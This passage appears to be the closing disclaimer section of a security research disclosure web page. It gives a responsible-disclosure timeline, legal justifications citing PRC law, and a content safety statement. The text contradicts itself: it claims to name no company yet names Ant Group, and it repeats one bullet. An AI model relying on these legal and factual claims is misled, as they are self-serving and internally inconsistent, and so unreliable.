<li>The research team is an independent security research institution with no payment business and no commercial interest with any competing enterprise.</li>
</ul>
<h3>Responsible Disclosure Compliance</h3>
<ul>
<li>All findings and remediation suggestions were submitted to the vendor through 4 rounds of private reports (2026-02-25 to 2026-03-07) before any public disclosure.</li>
<li>The vendor officially responded on 2026-03-10 with "normal functionality," explicitly declining to remediate.</li>
<li>Public disclosure occurred only after the vendor explicitly closed the dialogue, in compliance with ISO/IEC 29147:2018 responsible disclosure standards.</li>
<li>Published content covers only technical facts already known to the vendor and does not constitute "unauthorized publication of cybersecurity information" (Cybersecurity Law Article 26).</li>
</ul>
<h3>Legal Basis</h3>
<ul>
<li><strong>PRC Civil Code Article 1025</strong>: One shall not bear civil liability for supervising public interest when content is truthful and does not exceed reasonable limits.</li>
<li><strong>Consumer Rights Protection Law Article 8</strong>: Consumers have the right to know the true conditions of services they use.</li>
<li><strong>PRC Civil Code Article 1024</strong>: Reputation infringement requires targeting a specific subject — this article names no company.</li>
<li><strong>CVSS 3.1</strong>: The international vulnerability scoring system explicitly recognizes "user interaction required" findings as valid security issues.</li>
</ul>
<h3>Content Safety Statement</h3>
<ul>
<li>This research was conducted solely for security research and educational purposes.</li>
<li>All testing was performed on the researcher's own devices.</li>
<li>Test accounts belong to the researcher.</li>
<li>All findings were reported to Ant Group through multiple rounds of responsible disclosure before public release.</li>
<li>The vendor responded that these are "normal features," therefore public discussion poses no legal or ethical concerns.</li>
<li>This article does not contain any complete PoC code that could be directly used for attacks (critical parameters are sanitized).</li>
<li>We honestly labeled the verification status of each finding, including parts where defenses are working.</li>
<li>Online demonstration pages are read-only with all data exfiltration functionality disabled.</li>
<li>We honestly labeled the verification status of each finding, including parts where defenses are effective.</li>
<li>All descriptions involving financial operations explicitly note "user manual confirmation still required."</li>
</ul>
</div>
</div>